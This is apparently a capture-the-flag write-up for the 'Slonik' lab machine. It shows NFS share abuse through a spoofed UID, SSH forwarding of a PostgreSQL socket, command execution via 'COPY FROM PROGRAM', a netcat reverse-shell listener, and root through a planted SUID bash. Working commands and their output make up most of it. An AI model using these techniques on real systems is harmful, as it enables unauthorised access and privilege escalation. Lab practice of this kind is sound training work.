SLONIK-HTB Notes

Here is my notes on SLONIK box from Vulnlab which deployed to Hackthebox.
SLONIK: 10.10.103.127

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 2d8d0a43a75820736b8cfcb0d12f4507 (ECDSA)
|_  256 82fb90b0ebac20a2535e3c7cd33c3479 (ED25519)
111/tcp  open  rpcbind 2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100005  1,2,3      34599/udp6  mountd
|   100005  1,2,3      35759/tcp   mountd
|   100005  1,2,3      40169/tcp6  mountd
|   100005  1,2,3      59798/udp   mountd
|   100021  1,3,4      44493/tcp   nlockmgr
|   100021  1,3,4      45051/tcp6  nlockmgr
|   100021  1,3,4      49121/udp   nlockmgr
|   100021  1,3,4      53757/udp6  nlockmgr
|   100024  1          40097/tcp6  status
|   100024  1          48865/tcp   status
|   100024  1          49935/udp6  status
|   100024  1          54669/udp   status
|   100227  3           2049/tcp   nfs_acl
|_  100227  3           2049/tcp6  nfs_acl
2049/tcp open  nfs_acl 3 (RPC #100227)

┌──(root㉿kali)-[/home/kali/VULNLAB/SLONIK/10.10.103.127]
└─# showmount -e 10.10.103.127
Export list for 10.10.103.127:
/var/backups *
/home        *

mount -t nfs 10.10.103.127:/var/backups . -o nolock

/var/backups: 

#All of them have the same zip files each other and all of them contains postgresql backups configurations. 


NFS Troubleshooting:

mount -t nfs 10.10.103.127:/home . -o nolock

┌──(root㉿kali)-[/home/…/VULNLAB/SLONIK/10.10.103.127/nfs]
└─# tree -r .
.
├── home
│   └── service  [error opening dir]
└── backups
    ├── archive-2024-11-18T1758.zip
    └── archive-2024-11-18T1757.zip


┌──(root㉿kali)-[/home/…/SLONIK/10.10.103.127/nfs/home]
└─# ls
service

┌──(root㉿kali)-[/home/…/SLONIK/10.10.103.127/nfs/home]
└─# ls -lah
total 12K
drwxr-xr-x 3 root root 4.0K Oct 24  2023 .
drwxr-xr-x 4 root root 4.0K Nov 18 13:49 ..
drwxr-x--- 5 1337 1337 4.0K Oct 24  2023 service

Need to create user 1337 with UID and GUID of 1337. 

┌──(root㉿kali)-[/home/…/SLONIK/10.10.103.127/nfs/home]
└─# sudo groupadd -g 1337 hacker1337

┌──(root㉿kali)-[/home/…/SLONIK/10.10.103.127/nfs/home]
└─# sudo useradd -u 1337 -g 1337 -m hacker1337

┌──(root㉿kali)-[/home/…/SLONIK/10.10.103.127/nfs/home]
└─# getent passwd 1337
hacker1337:x:1337:1337::/home/hacker1337:/bin/sh

su - hacker1337

$ cd nfs
$ ls
backups  home
$ cd home
l$ s
service
$ ls -lah
total 12K
drwxr-xr-x 3 root       root       4.0K Oct 24  2023 .
drwxr-xr-x 4 root       root       4.0K Nov 18 13:49 ..
drwxr-x--- 5 hacker1337 hacker1337 4.0K Oct 24  2023 service
$ cd service
$ ls
$ ls
$ ls -lah
total 40K
drwxr-x--- 5 hacker1337 hacker1337 4.0K Oct 24  2023 .
drwxr-xr-x 3 root       root       4.0K Oct 24  2023 ..
-rw-rw-r-- 1 hacker1337 hacker1337   90 Oct 24  2023 .bash_history
-rw-r--r-- 1 hacker1337 hacker1337  220 Oct 24  2023 .bash_logout
-rw-r--r-- 1 hacker1337 hacker1337 3.7K Oct 24  2023 .bashrc
drwx------ 2 hacker1337 hacker1337 4.0K Oct 24  2023 .cache
drwxrwxr-x 3 hacker1337 hacker1337 4.0K Oct 24  2023 .local
-rw-r--r-- 1 hacker1337 hacker1337  807 Oct 24  2023 .profile
-rw------- 1 hacker1337 hacker1337  326 Oct 24  2023 .psql_history
drwxrwxr-x 2 hacker1337 hacker1337 4.0K Oct 24  2023 .ssh

$ cat .psql_history
CREATE DATABASE service;
\c service;
CREATE TABLE users ( id SERIAL PRIMARY KEY, username VARCHAR(255) NOT NULL, password VARCHAR(255) NOT NULL, description TEXT);
INSERT INTO users (username, password, description)VALUES ('service', 'aaabf0d39951f3e6c3e8a7911df524c2'WHERE', network access account');
select * from users;
\q
$ cd .ssh
$ ls
authorized_keys  id_ed25519.pub
$ cat id_ed25519.pub
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILVvRkNfH3506q1Odsrb551zZC2AeLTYW135HnJLpjCe service@slonik

aaabf0d39951f3e6c3e8a7911df524c2:service 

service:service 

#NOPE a rabbit hole. -NOT ACCESS SSH that easily. 

$ cat .bash_history
ls -lah /var/run/postgresql/
file /var/run/postgresql/.s.PGSQL.5432
psql -U postgres
exit

SSH PORT FORWARDING TIME with Unix Domain Socket: #POSTGRESQL in this case.

ssh -N -L /tmp/.s.PGSQL.5432:/var/run/postgresql/.s.PGSQL.5432 service@slonik.vl

ssh -N -L /tmp/.s.PGSQL.5432:/var/run/postgresql/.s.PGSQL.5432 service@10.10.103.127

ssh -R /tmp/remote_socket:/tmp/local_socket user@remote_host

https://code.whatever.social/exchange/unix/questions/498862/how-is-forwarding-can-be-also-done-through-unix-sockets-done

https://seriotonctf.github.io/2023/11/02/Slonik-Vulnlab/

psql -h /tmp -U postgres

Nothing interesting in postgresql Database unfortunately. 

CREATE TABLE cmd_exec(cmd_output text);
COPY cmd_exec FROM PROGRAM 'id';
SELECT * FROM cmd_exec;


service=# CREATE TABLE cmd_exec(cmd_output text);
CREATE TABLE
service=# COPY cmd_exec FROM PROGRAM 'id';
COPY 1
service=# SELECT * FROM cmd_exec;
                               cmd_output
------------------------------------------------------------------------
 uid=115(postgres) gid=123(postgres) groups=123(postgres),122(ssl-cert)
(1 row)

service=# COPY cmd_exec FROM PROGRAM 'id';
COPY 1
service=# SELECT * FROM cmd_exec;
                               cmd_output
------------------------------------------------------------------------
 uid=115(postgres) gid=123(postgres) groups=123(postgres),122(ssl-cert)
 uid=115(postgres) gid=123(postgres) groups=123(postgres),122(ssl-cert)
(2 rows)


POSTGRESQL RCE !

Convert it with reverse-shell with netcat as usual:

python3 -c 'import pty; pty.spawn("/bin/bash")'

┌──(root㉿kali)-[/home/kali/VULNLAB/SLONIK]
└─# sudo rlwrap nc -lnvp 443
listening on [any] 443 ...
connect to [10.8.0.71] from (UNKNOWN) [10.10.103.127] 57300

whoami
postgres
id
uid=115(postgres) gid=123(postgres) groups=123(postgres),122(ssl-cert)
python3 -c 'import pty; pty.spawn("/bin/bash")'

postgres@slonik:/var/lib/postgresql/14/main$


USER-SHELL ! 

postgres@slonik:/var/lib/postgresql$ whoami
whoami
postgres
postgres@slonik:/var/lib/postgresql$ id
id
uid=115(postgres) gid=123(postgres) groups=123(postgres),122(ssl-cert)
postgres@slonik:/var/lib/postgresql$ pwd
pwd
/var/lib/postgresql
postgres@slonik:/var/lib/postgresql$ ls
ls
14  user.txt
postgres@slonik:/var/lib/postgresql$ cat user.txt
cat user.txt
VL{REDIRECTED}

USER.TXT: VL{REDIRECTED}


PRIV ESC: 

no sudo -l 

no gcc 

no getcap binaries

no kernel exploit. 

no /etc/crontab*, /etc/crontab, crontab -l and /etc/cron.d neither !

pspy64s: 

2024/11/18 20:21:01 CMD: UID=0    PID=4244   | /bin/sh -c /usr/bin/backup
2024/11/18 20:21:01 CMD: UID=0    PID=4245   | /bin/bash /usr/bin/backup
2024/11/18 20:21:01 CMD: UID=0    PID=4246   | /usr/bin/date +%FT%H%M
2024/11/18 20:21:01 CMD: UID=0    PID=4247   | /usr/bin/rm -rf /opt/backups/current/PG_VERSION /opt/backups/current/backup_label /opt/backups/current/backup_manifest /opt/backups/current/base /opt/backups/current/global /opt/backups/current/pg_commit_ts /opt/backups/current/pg_dynshmem /opt/backups/current/pg_logical /opt/backups/current/pg_multixact /opt/backups/current/pg_notify /opt/backups/current/pg_replslot /opt/backups/current/pg_serial /opt/backups/current/pg_snapshots /opt/backups/current/pg_stat /opt/backups/current/pg_stat_tmp /opt/backups/current/pg_subtrans /opt/backups/current/pg_tblspc /opt/backups/current/pg_twophase /opt/backups/current/pg_wal /opt/backups/current/pg_xact /opt/backups/current/postgresql.auto.conf
2024/11/18 20:21:01 CMD: UID=0    PID=4248   | /usr/bin/perl /usr/bin/pg_basebackup -h /var/run/postgresql -U postgres -D /opt/backups/current/
2024/11/18 20:21:01 CMD: UID=115  PID=4249   | postgres: 14/main: walsender postgres [local] initializing
2024/11/18 20:21:01 CMD: UID=0    PID=4251   | /usr/lib/postgresql/14/bin/pg_basebackup -h /var/run/postgresql -U postgres -D /opt/backups/current/
2024/11/18 20:21:01 CMD: UID=115  PID=4250   | postgres: 14/main: walsender postgres [local] streaming 1/A40000D8
2024/11/18 20:21:02 CMD: UID=0    PID=4252   | /usr/bin/zip -r /var/backups/archive-2024-11-18T2021.zip /opt/backups/current/
2024/11/18 20:21:03 CMD: UID=0    PID=4253   | /bin/bash /usr/bin/backup
2024/11/18 20:21:03 CMD: UID=0    PID=4255   | /usr/bin/wc -l
2024/11/18 20:21:03 CMD: UID=0    PID=4254   | /usr/bin/find /var/backups/ -maxdepth 1 -type f -o -type d
2024/11/18 20:21:33 CMD: UID=115  PID=4258   | postgres: 14/main: autovacuum worker postgres

[SNIP]

2024/11/18 20:22:01 CMD: UID=0    PID=4261   | /bin/sh -c /usr/bin/backup
2024/11/18 20:22:01 CMD: UID=0    PID=4262   | /bin/bash /usr/bin/backup
2024/11/18 20:22:01 CMD: UID=0    PID=4263   | /usr/bin/date +%FT%H%M
2024/11/18 20:22:01 CMD: UID=0    PID=4264   | /usr/bin/rm -rf /opt/backups/current/PG_VERSION /opt/backups/current/backup_label /opt/backups/current/backup_manifest /opt/backups/current/base /opt/backups/current/global /opt/backups/current/pg_commit_ts /opt/backups/current/pg_dynshmem /opt/backups/current/pg_logical /opt/backups/current/pg_multixact /opt/backups/current/pg_notify /opt/backups/current/pg_replslot /opt/backups/current/pg_serial /opt/backups/current/pg_snapshots /opt/backups/current/pg_stat /opt/backups/current/pg_stat_tmp /opt/backups/current/pg_subtrans /opt/backups/current/pg_tblspc /opt/backups/current/pg_twophase /opt/backups/current/pg_wal /opt/backups/current/pg_xact /opt/backups/current/postgresql.auto.conf
2024/11/18 20:22:01 CMD: UID=0    PID=4265   | /usr/bin/perl /usr/bin/pg_basebackup -h /var/run/postgresql -U postgres -D /opt/backups/current/
2024/11/18 20:22:01 CMD: UID=115  PID=4266   | postgres: 14/main: walsender postgres [local] initializing
2024/11/18 20:22:01 CMD: UID=0    PID=4268   | /usr/lib/postgresql/14/bin/pg_basebackup -h /var/run/postgresql -U postgres -D /opt/backups/current/
2024/11/18 20:22:01 CMD: UID=115  PID=4267   | postgres: 14/main: walsender postgres [local] streaming 1/A60000D8
2024/11/18 20:22:02 CMD: UID=0    PID=4269   | /usr/bin/zip -r /var/backups/archive-2024-11-18T2022.zip /opt/backups/current/
2024/11/18 20:22:03 CMD: UID=0    PID=4270   | /bin/bash /usr/bin/backup
2024/11/18 20:22:03 CMD: UID=0    PID=4272   | /bin/bash /usr/bin/backup
2024/11/18 20:22:03 CMD: UID=0    PID=4271   | /usr/bin/find /var/backups/ -maxdepth 1 -type f -o -type d

/usr/bin/backup: 

postgres@slonik:/var/lib/postgresql/14/main$ ls -lah /usr/bin/backup
ls -lah /usr/bin/backup
-rwxr-xr-x 1 root root 392 Oct 24  2023 /usr/bin/backup

postgres@slonik:/var/lib/postgresql/14/main$ cat /usr/bin/backup
cat /usr/bin/backup
#!/bin/bash

date=$(/usr/bin/date +"%FT%H%M")
/usr/bin/rm -rf /opt/backups/current/*
/usr/bin/pg_basebackup -h /var/run/postgresql -U postgres -D /opt/backups/current/
/usr/bin/zip -r "/var/backups/archive-$date.zip" /opt/backups/current/

count=$(/usr/bin/find "/var/backups/" -maxdepth 1 -type f -o -type d | /usr/bin/wc -l)
if [ "$count" -gt 10 ]; then
  /usr/bin/rm -rf /var/backups/*
fi



#Backup all the stuff in /var/lib/postgresql/14/main to /opt/backups/current/ then remove the old one in /var/backups. 

So we are going to copy and paste /bin/bash in there then chmod u + s and wait for root to backup it to /opt/backups/current then use that malicious in /opt directory to gain a root shell.

postgres@slonik:/var/lib/postgresql/14/main$ cp /bin/bash bash
cp /bin/bash bash
postgres@slonik:/var/lib/postgresql/14/main$ chmod 777 bash
chmod 777 bash
postgres@slonik:/var/lib/postgresql/14/main$ chmod +x bash
chmod +x bash
postgres@slonik:/var/lib/postgresql/14/main$ chmod u+s bash
chmod u+s bash
postgres@slonik:/var/lib/postgresql/14/main$ ls -lah | grep "bash"
ls -lah | grep "bash"
-rwsrwxrwx  1 postgres postgres 1.4M Nov 18 20:43 bash

Then wait for a few seconds for malicious bash file in /opt/backups/current directory.

postgres@slonik:/opt/backups/current$ pwd
pwd
/opt/backups/current
postgres@slonik:/opt/backups/current$ ls -lah | grep "bash"
ls -lah | grep "bash"
-rwsrwxrwx  1 root root 1.4M Nov 18 20:45 bash
-rws------  1 root root 1.4M Nov 18 20:45 mybash
postgres@slonik:/opt/backups/current$ ./bash -p
./bash -p
bash-5.1# whoami
whoami
root
bash-5.1# id
id
uid=115(postgres) gid=123(postgres) euid=0(root) groups=123(postgres),122(ssl-cert)

ROOT-SHELL !

bash-5.1# whoami
whoami
root
bash-5.1# id
id
uid=115(postgres) gid=123(postgres) euid=0(root) groups=123(postgres),122(ssl-cert)
bash-5.1# pwd
pwd
/root
bash-5.1# ls
ls
root.txt  snap
bash-5.1# cat root.txt
cat root.txt
VL{REDIRECTED}

ROOT.TXT: VL{REDIRECTED}






35759/tcp open  mountd   1-3 (RPC #100005)
42363/tcp open  mountd   1-3 (RPC #100005)
44493/tcp open  nlockmgr 1-4 (RPC #100021)
48865/tcp open  status   1 (RPC #100024)
53517/tcp open  mountd   1-3 (RPC #100005)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

PORT    STATE SERVICE VERSION
111/udp open  rpcbind 2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100003  3,4         2049/tcp   nfs
|   100005  1,2,3      35759/tcp   mountd
|   100005  1,2,3      59798/udp   mountd
|   100021  1,3,4      44493/tcp   nlockmgr
|   100021  1,3,4      49121/udp   nlockmgr
|   100024  1          48865/tcp   status
|   100024  1          54669/udp   status
|_  100227  3           2049/tcp   nfs_acl
More posts

ATLAS-HTB Notes

ARTIFICIAL-HTB Notes

Learn Hacking By Examples

SLONIK-HTB Notes
